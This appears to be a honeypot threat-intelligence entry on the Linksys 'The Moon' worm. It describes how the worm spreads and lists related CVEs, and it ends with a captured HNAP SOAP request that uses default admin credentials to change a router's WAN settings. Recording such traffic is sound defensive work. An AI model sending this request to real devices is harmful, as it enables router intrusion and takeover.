1-1 of 1 results (1 page)
Linksys "The Moon" Worm
Dest. port: 80
Time: 26/09/2020 06:40:57
ASN/ISP: AS36813 Hamilton County Communications, Inc
Location: Illinois, McLeansboro (zipcode 62859)
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:
1.0.07 build 1
Next, the worm will send an exploit to a vulnerable CGI script running on these routers. The request does not require authentication. The worm sends random "admin" credentials but they are not checked by the script. This second request will launch a simple shell script, that will request the actual worm. The worm is about 2MB in size, samples that we captured so far appear pretty much identical but for a random trailer at the end of the binary. The file is an ELF MIPS binary.
Once this code runs, the infected router appears to scan for other victims.
CVE-2002-2159 , CVE-2008-1247 , CVE-2008-1268 , CVE-2008-4594 , CVE-2009-3341 , CVE-2010-1573 , CVE-2010-2261 , CVE-2008-0228
POST /HNAP1/ HTTP/1.0
Content-Type: text/xml; charset="utf-8"
authorization: Basic YWRtaW46YWRtaW4=
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><SetWanSettings xmlns="http://purenetworks.com/HNAP1/"><Type>Static</Type><IPAddress>10.107.18.75</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.107.18.218</Gateway></SetWanSettings></soap:Body></soap:Envelope>